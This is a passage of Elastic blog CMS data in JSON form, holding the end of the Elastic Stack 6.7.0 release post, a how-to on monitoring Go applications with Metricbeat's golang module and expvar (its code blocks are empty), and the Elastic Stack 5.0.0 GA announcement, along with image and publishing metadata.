href=\"/solutions/metrics\"\u003eInfrastructure solution\u003c/a\u003e gives users a bird's eye view of the health of all the components - servers, Kubernetes pods, Docker containers - in their infrastructure, making it easier to diagnose problems using log and metrics data. Building on the autodetect capabilities of Metricbeat, the tailored user interface allows you to interactively view and drill into the logs, metrics, and APM traces with a single click.\u003c/p\u003e\n \u003ch2\u003eGet ready for 7.0 with the Upgrade Assistant\u003c/h2\u003e\n \u003cp\u003e7.0.0 is coming soon (you can check out the \u003ca href=\"/blog/elastic-stack-7-0-0-beta1-released\"\u003ebeta here\u003c/a\u003e). The Upgrade Assistant in 6.7 is here to help you prepare your existing Elastic Stack environment for upgrade to 7.0. The Upgrade Assistant, which includes both APIs and UIs, is an important cluster checkup tool to help plan your upgrade, and identify things like deprecation warnings, indices that need to be upgraded or reindexed, and much more to enable a smoother upgrade experience.\u003c/p\u003e\n \u003ch2\u003eTry it now\u003c/h2\u003e\n \u003cp\u003eDeploy a cluster on our \u003ca href=\"/cloud/elasticsearch-service/signup\"\u003eElasticsearch Service\u003c/a\u003e or \u003ca href=\"/downloads\"\u003edownload the stack\u003c/a\u003e to take these latest features for a spin.\u003c/p\u003e","callout":[],"category":[{"uid":"bltfaae4466058cc7d6","_version":8,"locale":"en-us","ACL":{},"created_at":"2018-08-27T12:47:03.147Z","created_by":"sys_blt57a423112de8a853","key":"releases","label_l10n":"Product release","tags":[],"title":"Product release","updated_at":"2024-05-10T13:44:16.955Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.629Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-03-28T05:42:47.957Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"full_bleed_image":{"title":"elastic-stack-blog-banner.png","uid":"bltc6ca841d56fac957","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T06:00:13.894Z","updated_at":"2019-01-05T06:00:13.894Z","content_type":"image/png","file_size":"33477","filename":"elastic-stack-blog-banner.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-06-25T16:51:01.740Z","user":"blt5c97f327f30903e707c39c30"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc6ca841d56fac957/5c3047ed33d6423967f5b528/elastic-stack-blog-banner.png"},"markdown_l10n":"","publish_date":"2019-03-26T17:00:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"Elastic Stack 6.7.0 is here. Check out Elastic Maps, Elastic Uptime, localized Kibana, and much more. Plus, several important features graduate to GA status.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"title":"elastic-stack-blog-thumb.png","uid":"blt86b878c1e4511d2f","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T06:00:15.954Z","updated_at":"2019-01-05T06:00:15.954Z","content_type":"image/png","file_size":"26782","filename":"elastic-stack-blog-thumb.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-06-25T16:51:01.740Z","user":"blt5c97f327f30903e707c39c30"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt86b878c1e4511d2f/5c3047efc0508d076e1712bb/elastic-stack-blog-thumb.png"},"title":"Elastic Stack 6.7.0 released","title_l10n":"Elastic Stack 6.7.0 released","updated_at":"2024-11-08T01:00:48.730Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/elastic-stack-6-7-0-released","publish_details":{"time":"2024-11-08T01:37:59.890Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt7ff0f228b905f0fc","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt6342e0b82c07def7","bltf66d5c6f7e1ebb83"],"body_l10n":"\u003cp\u003eThe Elastic Stack can be easily leveraged to monitor Go applications. It allows to do things like analyzing memory usage (memory leaks anyone?), performing long-term monitoring, tuning and capturing diagnostics. Beats in particular, the lightweight data shippers in the Stack, are designed to sit alongside the applications and are a natural fit for this kind of monitoring.\u003c/p\u003e\u003cp\u003eMetricbeat is a Beat specialized in shipping service and/or server metrics, but also happens to be written in Go. It ships in a relatively small package (only about 10MB), and does not bring any additional dependencies with it. While its CPU overhead and memory footprint are also very light, it ships with modules for a variety of services such as:\u003c/p\u003e\u003cul\u003e\u003cli\u003eApache\u003c/li\u003e\u003cli\u003eCouchbase\u003c/li\u003e\u003cli\u003eDocker\u003c/li\u003e\u003cli\u003eHAProxy\u003c/li\u003e\u003cli\u003eKafka\u003c/li\u003e\u003cli\u003eMongoDB\u003c/li\u003e\u003cli\u003eMySQL\u003c/li\u003e\u003cli\u003eNginx\u003c/li\u003e\u003cli\u003ePostgreSQL\u003c/li\u003e\u003cli\u003ePrometheus\u003c/li\u003e\u003cli\u003eRedis\u003c/li\u003e\u003cli\u003eSystem\u003c/li\u003e\u003cli\u003eZooKeeper\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eIf the service you’re looking for is not listed, don’t worry: Metricbeat is extensible and \u003ca href=\"https://www.elastic.co/guide/en/beats/metricbeat/current/creating-metricsets.html\"\u003eyou can easily implement a module\u003c/a\u003e (and this post is proof of that!). We’d like to introduce you to the Golang Module for Metricbeat. It has merged into the master branch of \u003ca href=\"https://github.com/elastic/beats/tree/master/metricbeat/module/golang\"\u003eelastic/beats\u003c/a\u003e, and is expected to be released in version 6.0.\u003c/p\u003e\u003ch2\u003eSneak preview\u003c/h2\u003e\u003cp\u003eHere’s a Kibana Dashboard that captures the potential of the Golang Module for Metricbeat:\u003c/p\u003e\u003cp\u003e\u003cimg asset_uid=\"blt4e97dc508fe57d70\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4e97dc508fe57d70/5bbf10620e6edaf014d240f0/kibana-dashboard-golang.jpg\" alt=\"kibana-dashboard-golang.jpg\" height=\"auto\"/\u003e\u003c/p\u003e\u003cp\u003eThe top panel shows a summary of the heap usage, which gives us a general idea of \u003cwbr\u003e\u003cwbr\u003eGo's memory usage and GC status:\u003c/p\u003e\u003cul\u003e\u003cli\u003eSystem Total Memory: the total number of bytes obtained from the system\u003c/li\u003e\u003cli\u003eBytes allocated: overall bytes allocated, including memory that has since been freed\u003c/li\u003e\u003cli\u003eGC cycles: the number of garbage collections (GC) that occurred\u003c/li\u003e\u003cli\u003eGC limit: when heap memory allocation reaches this limit, the garbage collector is started. This can be different in each GC\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eThe middle panel has three charts in it with a breakdown of:\u003c/p\u003e\u003cul\u003e\u003cli\u003eheap memory\u003c/li\u003e\u003cli\u003esystem memory\u003c/li\u003e\u003cli\u003eobject statistics\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eHeap Allocated represents both memory in use and not yet reclaimed, while Heap Inuse is obviously the size of objects that are active. Heap Idle accounts for objects that have been allocated but can be reclaimed as free memory.\u003c/p\u003e\u003cp\u003eThe two charts in the bottom panel are the GC time and GC count statistics. CPU Fraction represents the percentage of CPU time spent on GC. The greater the value, the more frequently GC occurs, in other words more time wasted on GC. The trend seems upward and pretty steep, but the range of values is between 0.41% and 0.52% so not too worrisome. Normally the GC ratio warns an optimization in the code when it goes into the single digits.\u003c/p\u003e\u003ch3\u003eMemory leaks\u003c/h3\u003e\u003cp\u003eWith this information we will be able to know in much detail about Go's memory usage, distribution and GC implementation. For instance if we wanted to analyze whether there is a memory leak, we could check if the memory usage and heap memory allocation are somewhat stable. If for example GC Limit and Byte Allocation are clearly rising, it could be due to a memory leak.\u003c/p\u003e\u003cp\u003eHistorical information gives us great granularity in analyzing memory usage and GC patterns across different versions, or even commits!\u003c/p\u003e\u003ch2\u003eGreat, now how do I get it?\u003c/h2\u003e\u003ch3\u003eexpvar\u003c/h3\u003e\u003cp\u003eFirst things first, we need to enable Go's \u003ca href=\"https://golang.org/pkg/expvar\"\u003eexpvar service\u003c/a\u003e. expvar is a package in Go's standard library that exposes internal variables or statistics. Its usage is very simple, it's basically just a matter of importing the package in the application. It will automatically detect and register to an existing HTTP server:\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003e\u003c/pre\u003e\u003cp\u003eIf no HTTP server is available, the code below allows us to start one on port 6060:\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003e\u003c/pre\u003e\u003cp\u003eThe path registered by default is /debug/vars, we can access it at http://localhost:6060/debug/vars. It will expose data in JSON format, by default provides Go's \u003ca href=\"https://golang.org/pkg/runtime/#MemStats\"\u003eruntime.Memstats\u003c/a\u003e but of course we can also register our own variables.\u003c/p\u003e\u003ch3\u003eGo Metricbeat!\u003c/h3\u003e\u003cp\u003eNow that we have an application with expvar, we can use Metricbeat to get this information into Elasticsearch. The installation of Metricbeat is very simple, it's just a matter of \u003ca href=\"https://www.elastic.co/downloads/beats/metricbeat\"\u003edownloading a package\u003c/a\u003e. Before starting Metricbeat we just need modify the configuration file (metricbeat.yml) to enable the golang module:\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003e\u003c/pre\u003e\u003cp\u003eThe above configuration enables the Go monitoring module to poll for data every 10 seconds from heap.path. The other info that matters in the configuration file is the output:\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003e\u003c/pre\u003e\u003cp\u003eNow assuming Elasticsearch is already running, we can finally start Metricbeat:\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003e\u003c/pre\u003e\u003cp\u003eNow we are in business! Elasticsearch should have data, we can now start Kibana and customize the visualization for our needs. For this type of analysis \u003ca href=\"https://www.elastic.co/guide/en/kibana/current/timelion.html\"\u003eTimelion\u003c/a\u003e is a particulary good fit, and to get started quickly we can leverage the existing sample \u003ca href=\"https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-sample-dashboards.html\"\u003eKibana Dashobards\u003c/a\u003e for Metricbeat.\u003c/p\u003e\u003ch3\u003eMore than memory\u003c/h3\u003e\u003cp\u003eIn addition to monitoring the existing memory information, through expvar we can expose some additional internal information. For example we could do something like:\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003e\u003c/pre\u003e\u003cp\u003eIt's also possible to expose Metricbeat's internal stats, so it can basically can monitor itself. It can be done via the -httpprof option:\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003e\u003c/pre\u003e\u003cp\u003eNow we can navigate to http://127.0.0.1:6060/debug/vars and see statistics about the Elasticsearch output such as output.elasticsearch.events.acked, which represents the message sent to Elasticsearch for which Metricbeat received an ACK:\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003e\u003c/pre\u003e\u003cp\u003eWe Metricbeat exposing its own metrics, we can modify its configuration to use both sets of metrics. We can do so by adding a new expvar type:\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003e\u003c/pre\u003e\u003cp\u003eAs you can see we also used the namespace parameter and set it to metricbeat. We can now restart Metricbeat and we should start seeing the new metric.\u003c/p\u003e\u003ch4\u003eTimelion\u003c/h4\u003e\u003cp\u003eWe can take the output.elasticsearch.events.acked and output.elasticsearch.events.not_acked fields and use a simple Timelion expression to plot successes and failures in messages from Metricbeat to Elasticsearch:\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003e\u003c/pre\u003e\u003cp\u003eHere's the result in Kibana:\u003c/p\u003e\u003cp\u003e\u003cimg asset_uid=\"bltb97507142fea6f86\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb97507142fea6f86/5bbf106541d9d6bb1426368c/graph-golang.jpg\" alt=\"graph-golang.jpg\" height=\"auto\"/\u003e\u003c/p\u003e\u003cp\u003eFrom the chart the channel between Metricbeat and Elasticsearch appears to be stable and no messages were lost.\u003c/p\u003e\u003cp\u003eFinally, we can also compare the Metricbeat memory stats around the same time on the dashboard:\u003c/p\u003e\u003cp\u003e\u003cimg asset_uid=\"bltbd45fb9460b34183\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbd45fb9460b34183/5bbf106a0e6edaf014d240f6/graph-golang2.jpg\" alt=\"graph-golang2.jpg\" height=\"auto\"/\u003e\u003c/p\u003e\u003ch2\u003eComing up in Beats 6\u003c/h2\u003e\u003cp\u003eThis module will be released with Beats 6.0, but you can start using it right now by cloning (or forking ;) the \u003ca href=\"https://github.com/elastic/beats\"\u003eBeats repo\u003c/a\u003e on GitHub and building the binary yourself.\u003c/p\u003e\u003cp\u003e\u003cem\u003eBanner image credit: \u003c/em\u003e\u003ca href=\"https://golang.org/doc/gopher\"\u003e\u003cem\u003egolang.org\u003c/em\u003e\u003c/a\u003e\u003c/p\u003e","callout":[],"category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T10:50:03.330Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"uid":"bltba17b6f6e424a604","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T09:16:30.810Z","updated_at":"2018-10-11T09:16:30.810Z","content_type":"image/jpeg","file_size":"129077","filename":"banner-five-years-animals-pig-brain-machine.jpg","title":"banner-five-years-animals-pig-brain-machine.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-02T22:09:58.600Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltba17b6f6e424a604/5bbf14eec863b8e614127084/banner-five-years-animals-pig-brain-machine.jpg"},"markdown_l10n":"","publish_date":"2017-04-20T18:31:52.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"Introducing the Golang Module for Metricbeat.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"bltf94c4f5944b0373d","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T09:16:27.846Z","updated_at":"2018-10-11T09:16:27.846Z","content_type":"image/jpeg","file_size":"88702","filename":"thumb-five-years-animals-pig-brain-machine.jpg","title":"thumb-five-years-animals-pig-brain-machine.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-02T22:09:58.600Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf94c4f5944b0373d/5bbf14eb831347c0148aee0f/thumb-five-years-animals-pig-brain-machine.jpg"},"title":"Tuning Go Apps with Metricbeat","title_l10n":"Tuning Go Apps with Metricbeat","updated_at":"2024-11-08T00:53:24.169Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/monitor-and-optimize-golang-application-by-using-elastic-stack","publish_details":{"time":"2024-11-08T00:53:29.443Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blta38e6811d129e51b","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"After almost a year of substantial effort, including 5 Alphas, 1 Beta, and 1 Release Candidate we are pleased to announce Elastic Stack 5.0.0 GA.","author":["blt4990cfe37610ed0f"],"body_l10n":"\u003cp\u003eIn February of 2016, following Elastic{ON} 16, I wrote a post titled \u003ca href=\"https://www.elastic.co/blog/heya-elastic-stack-and-x-pack\"\u003e\u003cem\u003eHeya, Elastic Stack and X-Pack\u003c/em\u003e\u003c/a\u003e. Today, after almost a year of substantial effort, including 5 Alphas, 1 Beta, and 1 Release Candidate we are pleased to announce the GA release of the Elastic Stack.\u003cbr /\u003e\u003c/p\u003e\n\u003cp\u003eAnd, importantly, it is available – today – on \u003ca href=\"https://www.elastic.co/cloud/as-a-service/signup\"\u003eElastic Cloud\u003c/a\u003e. If you want hosted Elasticsearch and Kibana there is no other place to start with the most recent code. We are committed to making Elastic Cloud the best place to run hosted Elasticsearch. In fact, we even made the Release Candidate available on cloud for testing purposes.\u003c/p\u003e\n\u003cp\u003eOur team is celebrating today. I hope you join us.\u003c/p\u003e\n\u003cp\u003eThe GA release is available today. Join the Elastic Team for a live\u0026nbsp;virtual event on November 3 to learn more about the release and ask the creators questions (AMA style). \u003ca href=\"https://www.elastic.co/live/v5\"\u003eRegister now!\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"video embed-container\" style=\"height: 319.725px;\"\u003e\u003cimg class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/tVWVLqbvAweDiKrXJBVdDh.jpg\" data-uuid=\"tVWVLqbvAweDiKrXJBVdDh\" data-v=\"4\" data-type=\"inline\" style=\"width: 100%;margin: auto;display: block;\" width=\"100%\" /\u003e\u003c/div\u003e\n\u003cp\u003e\u003cbr /\u003e\u003c/p\u003e\n\u003cp\u003eBefore exploring the release in detail, I want to take the opportunity to reflect on what has brought us to this point.\u003c/p\u003e\n\u003ch2\u003eOur Community\u003c/h2\u003e\n\u003cp\u003eDuring the recent Elastic{ON} Tour, I have begun each session discussing a brief history of the last several years. This session culminates in the announcement that we have reached a combined 75 Million downloads. When I first began the project, I hoped for widespread adoption. But the passion and fervor of our community continues to delight and amaze me.\u003c/p\u003e\n\u003ch2\u003ePioneer Program\u003c/h2\u003e\n\u003cp\u003eWith that in mind, I want to share the results of the \u003ca href=\"https://www.elastic.co/blog/elastic-pioneer-program\"\u003ePioneer Program\u003c/a\u003e. The program began with a simple premise. Your usage of the Elastic Stack is of the utmost importance in informing our development as well as ensuring we release the highest quality product available. I am pleased to say that the community has filed 146 issues since the first Alpha release in April.\u003c/p\u003e\n\u003cp\u003eOur community is one of our most valued assets at Elastic. In fact, one of the most discussed changes in this release was the name “Elastic Stack”.\u003c/p\u003e\n\u003ch2\u003eThe Elastic Stack\u003c/h2\u003e\n\u003cdiv class=\"row\"\u003e\n \u003cdiv class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12 product-type-wrapper\"\u003e\n \u003cdiv class=\"row\"\u003e\n \u003cdiv class=\"col-lg-8 col-md-8 col-sm-8 col-xs-12\"\u003e\n \u003cp\u003eLast year, we brought the Packetbeat team on board, and Beats was born. This open source platform for building lightweight data shippers for log files, infrastructure metrics, network packets, and more, made it easier than ever to send data to Elasticsearch and Logstash. While we love how many of you who have adopted the abbreviation ELK for our stack, with Beats, we just couldn’t figure out how to make the “B” work with the E-L-K combination.\u003c/p\u003e\n \u003c/div\u003e\n \u003cdiv class=\"col-lg-4 col-md-4 col-sm-4 col-xs-12\"\u003e\u003cimg asset_uid=\"blt40b62c19d76e25d5\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt40b62c19d76e25d5/5bbc9f43eb7e90a514e6e01d/elastic-elk-b.png\" alt=\"ELK Bee\" width=\"153\" height=\"88\" style=\"max-width: 100%;width: 153;height: 88;margin: 0px 0px 20px 20px;\" /\u003e\u003c/div\u003e\n \u003c/div\u003e\n \u003c/div\u003e\n\u003c/div\u003e\n\u003cp\u003eBut Elastic Stack is more than just a name. When we began this release cycle we committed to developing, building, testing, and releasing the entirety of the Stack together. This is important, internally, to ensure compatibility. And, for you, it helps speed deployment, decrease version confusion, and make it easier for developers to add capabilities across the entirety of the Elastic Stack.\u003c/p\u003e\n\u003ch2\u003eA Feature Tour\u003c/h2\u003e\n\u003cp\u003eWhen I began this post, I intended to provide an overview of key features in each product. But, it was hard to know where to begin and where to stop. Each of our team and tech leads have created a post that discusses the features specific to their product. And there is no one better suited to tell the story than them. I am, particularly, excited about a few items but rather than enumerate in detail, I will provide a brief overview and encourage you to read the detail posts for each product.\u003c/p\u003e\n\u003cdiv class=\"video embed-container\" style=\"height: 319.725px;\"\u003e\u003cimg class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/NqTNwGZSqRbAmPTCVQisef.jpg\" data-uuid=\"NqTNwGZSqRbAmPTCVQisef\" data-v=\"4\" data-type=\"inline\" style=\"width: 100%;margin: auto;display: block;\" width=\"100%\" /\u003e\u003c/div\u003e\n\u003cul\u003e\n \u003cli\u003e\u003cstrong\u003eIngest Node\u003c/strong\u003e - Ingest Node is an Elasticsearch node type enabling some data enrichment capabilities like grok, geoip, date, and other basic event manipulation options at index (or re-index) time. Pipelines are constructed with processors, and accessed through the REST API by suffixing a query parameter “?pipeline=x”. The ability to add pre-processing to documents, natively in Elasticsearch, prior to indexing allows for a variety of creative ingest deployments. This doesn’t replace Logstash. This doesn’t remove the need for Beats, this just allows greater flexibility in designing your ingest architecture.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003eElasticsearch Performance\u003c/strong\u003e - Benchmarks tend to have an agenda…especially competitive benchmarks. With that in mind, we have spent substantial effort comparing 5.0.0 to prior releases. This data is available to you. This data is what we inspect when we want to ensure that we are doing the right things with performance and we are doing so in public to work towards preventing the secrecy, and doubt, that are associated with benchmark numbers. In fact, not only are the results available but we also document our hardware configuration, we have open sourced the tooling (called \u003ca href=\"https://github.com/elastic/rally\"\u003eRally\u003c/a\u003e) and the benchmarks themselves (\u003ca href=\"https://github.com/elastic/rally-tracks\"\u003eRally-Tracks\u003c/a\u003e).\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003eMetricbeat\u003c/strong\u003e - Metricbeat replaces Topbeat as the primary tool for collecting metrics in the Elastic stack. Like Topbeat, Metricbeat collects “top” like statistics about host and per process resources (CPU, memory, disk, network). Unlike Topbeat, Metricbeat also collects metrics from systems such as Apache, HAProxy, MongoDB, MySQL, Nginx, PostgreSQL, Redis, or Zookeeper, with more to come in the near future.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003eLogstash Monitoring APIs\u003c/strong\u003e - A new monitoring feature provides runtime visibility into the Logstash pipeline and its plugins. This component collects various kinds of operational metrics while Logstash processes your data, and all of this information can be queried using simple APIs.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003eTimelion\u003c/strong\u003e - After being introduced as a {Re}search project, Timelion is now natively available in Kibana core. Timelion provides a query DSL and visualizations that let you explore your data over time.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThis is but a sample, I’ve left out BKD trees, scaled_float and half_float, the immense effort put into \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/resiliency/current/index.html\"\u003eElasticsearch Resiliency\u003c/a\u003e, the eye-meltingly beautiful redesign of Kibana (we never knew how much we hated borders until we removed them), Kafka output in Beats, and so much more.\u003c/p\u003e\n\u003cp\u003eThis is a massive release. Reading the individual posts is a must to begin to understand the scope of improvement.\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/elasticsearch-5-0-0-released\"\u003eElasticsearch\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/kibana-5-0-0-released\"\u003eKibana\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/beats-5-0-0-released\"\u003eBeats\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/logstash-5-0-0-released\"\u003eLogstash\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/es-hadoop-5-0-0-released\"\u003eES-Hadoop\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/x-pack-5-0-0-released\"\u003eX-Pack\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eX-Pack\u003c/h2\u003e\n\u003cp\u003eAt Elastic we loved extensions. So much so that we built them and gave them interesting names. Shield, Marvel, and Watcher all described individual closed source features that didn’t take away for open source capability but were additive for our customers. Unfortunately, as the range of these features grew to include Graph and Reporting, the install process became difficult and, at times, quite confusing.\u003c/p\u003e\n\u003cp\u003eSay Heya to X-Pack!\u003c/p\u003e\n\u003cp\u003eOne pack that adds security, alerting, monitoring \u0026amp; management, reporting, and graph capabilities to the Elastic Stack. Our engineering process for 5.0 wasn’t limited to the Elastic Stack, but we’ve also extended X-Pack by adding:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eManagement \u0026amp; Monitoring UIs to Kibana\u003c/li\u003e\n \u003cli\u003eSecurity UIs to Kibana for creating both users and roles\u003c/li\u003e\n \u003cli\u003eGreatly simplified the installation process\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eX-Pack is available to trial and has both commercial and free (Basic) license options. We are particularly excited to make some X-Pack features available for free and details are available on our \u003ca href=\"https://www.elastic.co/subscriptions\"\u003eSubscriptions\u003c/a\u003e page.\u003c/p\u003e\n\u003ch2\u003eIn Closing\u003c/h2\u003e\n\u003cp\u003eI am in awe of the effort that went into this release, the involvement from our community and customers, and the groundwork that this sets for future releases. As always, the best way to understand a release is to experience it.\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/downloads/elasticsearch\"\u003eElasticsearch 5.0.0 download\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/downloads/kibana\"\u003eKibana 5.0.0 download\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/downloads/x-pack\"\u003eX-Pack 5.0.0 install instructions\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/downloads/logstash\"\u003eLogstash 5.0.0 download\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/downloads/beats\"\u003eBeats 5.0.0 download\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/downloads/hadoop\"\u003eES-Hadoop 5.0.0 download\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","callout":[],"category":[{"uid":"bltfaae4466058cc7d6","_version":8,"locale":"en-us","ACL":{},"created_at":"2018-08-27T12:47:03.147Z","created_by":"sys_blt57a423112de8a853","key":"releases","label_l10n":"Product release","tags":[],"title":"Product release","updated_at":"2024-05-10T13:44:16.955Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.629Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T13:39:40.895Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"uid":"blt62658bdf6132372a","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T05:10:00.388Z","updated_at":"2018-10-11T05:10:00.388Z","content_type":"image/jpeg","file_size":"83323","filename":"blog-es-banner.jpg","title":"blog-es-banner.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-30T18:11:51.718Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt62658bdf6132372a/5bbedb28560fdc4d0c8e694c/blog-es-banner.jpg"},"markdown_l10n":"","publish_date":"2016-10-26T16:07:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"After almost a year of substantial effort, including 5 Alphas, 1 Beta, and 1 Release Candidate we are pleased to announce Elastic Stack 5.0.0 GA","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"bltffc18a4997b2519e","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T05:34:02.309Z","updated_at":"2018-10-11T05:34:02.309Z","content_type":"image/jpeg","file_size":"41531","filename":"blog-es-thumb.jpg","title":"blog-es-thumb.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-30T18:11:51.718Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltffc18a4997b2519e/5bbee0cae08e068c0ca29ff6/blog-es-thumb.jpg"},"title":"Elastic Stack 5.0.0 Released","title_l10n":"Elastic Stack 5.0.0 